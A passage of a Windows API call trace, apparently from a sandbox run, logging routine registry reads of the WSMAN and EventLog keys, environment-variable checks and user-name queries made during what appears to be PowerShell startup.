	[0735.322] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d3fc, lpData=0x466bd0, lpcbData=0x26d3f8*=0x8 | out: lpType=0x26d3fc*=0x1, lpData="2.0", lpcbData=0x26d3f8*=0x8) returned 0x0
	[0735.322] CoTaskMemFree (pv=0x466bd0) 
	[0736.606] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3e8 | out: phkResult=0x26d3e8*=0x2e8) returned 0x0
	[0736.607] RegQueryInfoKeyW (in: hKey=0x2e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d2ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d2e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d2ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d2e8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.607] CoTaskMemFree (pv=0x0) 
	[0736.607] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.607] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x0, lpValueName=0x4469e0, lpcchValueName=0x26d398, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d398, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0736.607] CoTaskMemFree (pv=0x4469e0) 
	[0736.607] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.607] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x1, lpValueName=0x4469e0, lpcchValueName=0x26d398, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d398, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0736.607] CoTaskMemFree (pv=0x4469e0) 
	[0736.607] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.607] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x2, lpValueName=0x4469e0, lpcchValueName=0x26d398, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d398, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0736.607] CoTaskMemFree (pv=0x4469e0) 
	[0736.607] RegQueryValueExW (in: hKey=0x2e8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d37c, lpData=0x0, lpcbData=0x26d378*=0x0 | out: lpType=0x26d37c*=0x1, lpData=0x0, lpcbData=0x26d378*=0x8) returned 0x0
	[0736.607] CoTaskMemAlloc (cb=0xc) returned 0x466b50
	[0736.608] RegQueryValueExW (in: hKey=0x2e8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d34c, lpData=0x466b50, lpcbData=0x26d348*=0x8 | out: lpType=0x26d34c*=0x1, lpData="2.0", lpcbData=0x26d348*=0x8) returned 0x0
	[0736.608] CoTaskMemFree (pv=0x466b50) 
	[0736.608] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0736.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.608] CoTaskMemFree (pv=0x444820) 
	[0736.613] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0736.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.614] CoTaskMemFree (pv=0x444820) 
	[0736.619] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d418 | out: phkResult=0x26d418*=0x304) returned 0x0
	[0736.624] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d38c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d388, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d38c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d388*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.624] CoTaskMemFree (pv=0x0) 
	[0736.625] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.625] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.625] CoTaskMemFree (pv=0x4469e0) 
	[0736.625] CoTaskMemFree (pv=0x0) 
	[0736.625] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.625] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.625] CoTaskMemFree (pv=0x4469e0) 
	[0736.625] CoTaskMemFree (pv=0x0) 
	[0736.625] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.625] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.626] CoTaskMemFree (pv=0x4469e0) 
	[0736.626] CoTaskMemFree (pv=0x0) 
	[0736.626] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.626] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.626] CoTaskMemFree (pv=0x4469e0) 
	[0736.626] CoTaskMemFree (pv=0x0) 
	[0736.626] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.626] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.626] CoTaskMemFree (pv=0x4469e0) 
	[0736.626] CoTaskMemFree (pv=0x0) 
	[0736.626] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.626] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.626] CoTaskMemFree (pv=0x4469e0) 
	[0736.626] CoTaskMemFree (pv=0x0) 
	[0736.626] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.626] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.626] CoTaskMemFree (pv=0x4469e0) 
	[0736.626] CoTaskMemFree (pv=0x0) 
	[0736.626] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.626] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.626] CoTaskMemFree (pv=0x4469e0) 
	[0736.626] CoTaskMemFree (pv=0x0) 
	[0736.626] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0736.626] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x4469e0, lpcchName=0x26d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0736.626] CoTaskMemFree (pv=0x4469e0) 
	[0736.626] CoTaskMemFree (pv=0x0) 
	[0736.627] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x32c) returned 0x0
	[0736.627] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x0) returned 0x2
	[0736.627] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x330) returned 0x0
	[0736.627] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x0) returned 0x2
	[0736.627] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x334) returned 0x0
	[0736.627] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x0) returned 0x2
	[0736.627] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x338) returned 0x0
	[0736.627] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x0) returned 0x2
	[0736.627] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x33c) returned 0x0
	[0736.627] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x0) returned 0x2
	[0736.627] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x340) returned 0x0
	[0736.628] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x0) returned 0x2
	[0736.628] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x344) returned 0x0
	[0736.628] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x0) returned 0x2
	[0736.628] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x348) returned 0x0
	[0736.628] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x0) returned 0x2
	[0736.628] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x34c) returned 0x0
	[0736.628] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x350) returned 0x0
	[0736.628] RegCloseKey (hKey=0x350) returned 0x0
	[0736.628] RegCloseKey (hKey=0x304) returned 0x0
	[0736.629] RegCloseKey (hKey=0x34c) returned 0x0
	[0738.242] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0738.242] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d688) returned 0x1
	[0739.157] CoTaskMemFree (pv=0x1b8abbe0) 
	[0739.159] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0739.159] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d6c8) returned 1
	[0739.160] CoTaskMemFree (pv=0x4469e0) 
	[0740.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3c8 | out: phkResult=0x26d3c8*=0x354) returned 0x0
	[0740.541] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d33c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d338, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d33c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d338*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.541] CoTaskMemFree (pv=0x0) 
	[0740.541] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.541] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.541] CoTaskMemFree (pv=0x4469e0) 
	[0740.541] CoTaskMemFree (pv=0x0) 
	[0740.541] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.541] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.541] CoTaskMemFree (pv=0x4469e0) 
	[0740.541] CoTaskMemFree (pv=0x0) 
	[0740.541] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.541] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.541] CoTaskMemFree (pv=0x4469e0) 
	[0740.542] CoTaskMemFree (pv=0x0) 
	[0740.542] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.542] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.542] CoTaskMemFree (pv=0x4469e0) 
	[0740.542] CoTaskMemFree (pv=0x0) 
	[0740.542] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.542] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.542] CoTaskMemFree (pv=0x4469e0) 
	[0740.542] CoTaskMemFree (pv=0x0) 
	[0740.542] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.542] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.542] CoTaskMemFree (pv=0x4469e0) 
	[0740.542] CoTaskMemFree (pv=0x0) 
	[0740.542] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.542] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.542] CoTaskMemFree (pv=0x4469e0) 
	[0740.542] CoTaskMemFree (pv=0x0) 
	[0740.543] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.543] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.543] CoTaskMemFree (pv=0x4469e0) 
	[0740.543] CoTaskMemFree (pv=0x0) 
	[0740.543] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.543] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.543] CoTaskMemFree (pv=0x4469e0) 
	[0740.543] CoTaskMemFree (pv=0x0) 
	[0740.543] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x358) returned 0x0
	[0740.543] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.543] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x35c) returned 0x0
	[0740.543] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.543] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x360) returned 0x0
	[0740.544] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.544] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x364) returned 0x0
	[0740.544] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.544] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x368) returned 0x0
	[0740.544] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.544] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x36c) returned 0x0
	[0740.544] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.544] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x370) returned 0x0
	[0740.544] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.545] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x374) returned 0x0
	[0740.545] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.545] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x378) returned 0x0
	[0740.545] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x37c) returned 0x0
	[0740.545] RegCloseKey (hKey=0x37c) returned 0x0
	[0740.545] RegCloseKey (hKey=0x354) returned 0x0
	[0740.546] RegCloseKey (hKey=0x378) returned 0x0
	[0740.546] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3c8 | out: phkResult=0x26d3c8*=0x378) returned 0x0
	[0740.546] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d33c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d338, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d33c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d338*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.546] CoTaskMemFree (pv=0x0) 
	[0740.547] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.547] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.547] CoTaskMemFree (pv=0x4469e0) 
	[0740.547] CoTaskMemFree (pv=0x0) 
	[0740.547] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.547] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.547] CoTaskMemFree (pv=0x4469e0) 
	[0740.547] CoTaskMemFree (pv=0x0) 
	[0740.547] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.547] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.547] CoTaskMemFree (pv=0x4469e0) 
	[0740.547] CoTaskMemFree (pv=0x0) 
	[0740.547] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.547] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.547] CoTaskMemFree (pv=0x4469e0) 
	[0740.548] CoTaskMemFree (pv=0x0) 
	[0740.548] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.548] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.548] CoTaskMemFree (pv=0x4469e0) 
	[0740.548] CoTaskMemFree (pv=0x0) 
	[0740.548] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.548] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.548] CoTaskMemFree (pv=0x4469e0) 
	[0740.548] CoTaskMemFree (pv=0x0) 
	[0740.548] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.548] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.548] CoTaskMemFree (pv=0x4469e0) 
	[0740.548] CoTaskMemFree (pv=0x0) 
	[0740.548] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.548] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.548] CoTaskMemFree (pv=0x4469e0) 
	[0740.549] CoTaskMemFree (pv=0x0) 
	[0740.549] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.549] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x4469e0, lpcchName=0x26d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.549] CoTaskMemFree (pv=0x4469e0) 
	[0740.549] CoTaskMemFree (pv=0x0) 
	[0740.549] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x354) returned 0x0
	[0740.549] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
